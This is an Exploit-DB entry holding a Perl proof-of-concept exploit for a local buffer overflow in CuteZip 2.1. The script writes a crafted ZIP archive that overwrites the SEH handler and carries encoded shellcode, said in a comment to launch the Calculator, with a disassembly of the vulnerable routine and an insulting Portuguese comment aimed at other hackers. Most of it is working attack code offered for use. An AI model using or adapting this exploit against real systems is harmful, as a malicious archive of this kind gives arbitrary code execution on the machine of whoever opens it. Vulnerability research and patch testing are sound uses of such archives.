CuteZip 2.1 - Local Buffer Overflow

EDB-ID:

16162

CVE:



Platform:

Windows

Published:

2011-02-12

#!/usr/bin/perl
#
#[+]Exploit Title: Exploit Buffer Overflow CuteZip 2.1
#[+]Date: 02\12\2011
#[+]Author: C4SS!0 G0M3S
#[+]Software Link: http://www.globalscape.com/files/cutezip20b.exe
#[+]Version: 2.1 build 9.24.1
#[+]Tested on: WIN-XP SP3 PORTUGUESE BRAZILIAN	
#[+]CVE: N/A
#
#            Comment in Brazilian Portuguese
#                       ||
#                       ||
#                       \/    
#
#Comentario para quem é do Brasil:
#
#Ola Lammers Brasileiros Copiando Receitas de Bolos na internet né,
#Um Bando de Lammers que dizem ser o Metasploit Brazil 
#Caras Voces Nao sabem nem Programar em ruby,perl,python,c ou java
#Estude muito,nao suje o no do Metasploit.
#
#Esse Recado foi para o Metasploit Brasil se tiver Achando Ruim 
#Me Contate por E-mail.
#
#
#
#Comment:
#
# The structure of this exploit has zip Copied exploits of the team Corelan
# Link: http://www.exploit-db.com/exploits/11764/
#
#
#                           Vulnerable function
#                                   ||
#									||
#									\/
#
# 0x0047CC0E                     .^72 CC          JB SHORT CuteZip.0047CBDC
# 0x0047CC10                     . F3:A5          REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS>
# 0x0047CC12                     . FF2495 C8CC470>JMP DWORD PTR DS:[EDX*4+47CCC8]
# 0x0047CC19                       8D49 00        LEA ECX,DWORD PTR DS:[ECX]
# 0x0047CC1C                     > 23D1           AND EDX,ECX
# 0x0047CC1E                     . 8A06           MOV AL,BYTE PTR DS:[ESI]
# 0x0047CC20                     . 8807           MOV BYTE PTR DS:[EDI],AL
# 0x0047CC22                     . 8A46 01        MOV AL,BYTE PTR DS:[ESI+1]
# 0x0047CC25                     . C1E9 02        SHR ECX,2
# 0x0047CC28                     . 8847 01        MOV BYTE PTR DS:[EDI+1],AL
# 0x0047CC2B                     . 83C6 02        ADD ESI,2
# 0x0047CC2E                     . 83C7 02        ADD EDI,2
# 0x0047CC31                     . 83F9 08        CMP ECX,8
# 0x0047CC34                     .^72 A6          JB SHORT CuteZip.0047CBDC
# 0x0047CC36                     . F3:A5          REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS>      ===> //Here is the function that occurs Buffer Overflow 
# 0x0047CC38                     . FF2495 C8CC470>JMP DWORD PTR DS:[EDX*4+47CCC8]
# 0x0047CC3F                       90             NOP
# 0x0047CC40                     > 23D1           AND EDX,ECX
# 0x0047CC42                     . 8A06           MOV AL,BYTE PTR DS:[ESI]
# 0x0047CC44                     . 8807           MOV BYTE PTR DS:[EDI],AL
# 0x0047CC46                     . 46             INC ESI
# 0x0047CC47                     . C1E9 02        SHR ECX,2
# 0x0047CC4A                     . 47             INC EDI
# 0x0047CC4B                     . 83F9 08        CMP ECX,8
# 0x0047CC4E                     .^72 8C          JB SHORT CuteZip.0047CBDC
# 0x0047CC50                     . F3:A5          REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS>
# 0x0047CC52                     . FF2495 C8CC470>JMP DWORD PTR DS:[EDX*4+47CCC8]
# 0x0047CC59                       8D49 00        LEA ECX,DWORD PTR DS:[ECX]
#
#
#
#
#
#
#


use IO::File;

if($^O=="windows")
{
system("cls");
system("color 4f");
}
else
{
system("clear");
}


sub banner
{
print q{

[+]Exploit: Exploit Buffer Overflow CuteZip 2.1
[+]Date: 02\\12\\2011
[+]Author: C4SS!0 G0M3S
[+]Home: www.invasao.com.br
[+]E-mail: Louredo_@hotmail.com
[+]Version: 2.1 build 9.24.1
[+]Thanks: Corelan Team, Skylined
[+]Impact: Hich

};
}
my $file = $ARGV[0];


if($#ARGV!=0)
{
banner;
print "[-]Usage: $0 <File Name>\n";
print "[-]Exemple: $0 Exploit.zip\n";

 exit(0);
}
banner;

my $ldf_header = "\x50\x4B\x03\x04\x14\x00\x00".
"\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" .
"\x00\x00\x00\x00\x00\x00\x00\x00" .
"\xe4\x0f" .
"\x00\x00\x00";

my $cdf_header = "\x50\x4B\x01\x02\x14\x00\x14".
"\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" .
"\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\xe4\x0f".
"\x00\x00\x00\x00\x00\x00\x01\x00".
"\x24\x00\x00\x00\x00\x00\x00\x00";

my $eofcdf_header = "\x50\x4B\x05\x06\x00\x00\x00".
"\x00\x01\x00\x01\x00".
"\x12\x10\x00\x00".
"\x02\x10\x00\x00".
"\x00\x00";

my $payload = "\x41" x 1148;
my $nseh = "\xeb\x07\x90\x90";
my $seh = pack('V',0x0040112F);

my $egg = "\x41" x 2;
$egg .= "\x61\x61\x61\x51\x58\xFF\xD0";

my $shellcode = "\x41" x 123;

print "[*]Identifying the length Shellcode\n";
sleep(1);

$shellcode = $shellcode.
"PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIOJDKJTSICL9MYQ8YRTQ4L".
"41K6IXI81WBLCZKKL6QQC4NUSV8KJMKLIY2JJN5RRQJJKMUKKOO9JZ7Z884POWXJJLXSS8CON5XJW912".
"6WONPTLG14NQQOQPMYLMQOSFQUN9FUSTKXQFKQUPL4OIS4W5U1T3FLHQ2EHPKOYKTDWZSHQMQM7MPBKL".#SHELLCODE WinExec("CALC",0);
"KVW7HKWHCNOP2NOKCHNMGNSO8LYMLS0OJTXRUPYQSFKNYFVBZK47DQVNZFBNGWMNPPQPZQV337XMPXCL".
"VLJ0C3C3CVKMWKRL0GWBLSP1NVKBSOUN4V7L8G8WKYNOJ2NMOOKTYTNLFE1XOFOHXHMNPZ5LRKOOUNLK".
"HLUVXGLMWHP7KWNMXSB644O4CEMVCLPO6QJ9KYJPKXJD4LCTYPOTYVTJTLSQ4OGKMRK8SI7D7BNMO2OB".
"K4BX0S5LKNQX14OM8646B9CZOA";

print "[*]The length is Shellcode:".(length($shellcode)-123)."\n";
sleep(1);

my $junk = "\x42" x (4064-length($payload.$nseh.$seh.$egg.$shellcode));

$payload = $payload.$nseh.$seh.$egg.$shellcode.$junk;

$payload = $payload.".txt";
my $Exploit = $ldf_header.$payload.
              $cdf_header.$payload.
			  $eofcdf_header;
print "[*]Creating the file $file\n";
sleep(1);

open(f,">$file")|| die("Error:\n$!\n");
print f $Exploit;
close(f);
print "[*]The File $file Created Successfully\n";
sleep(1);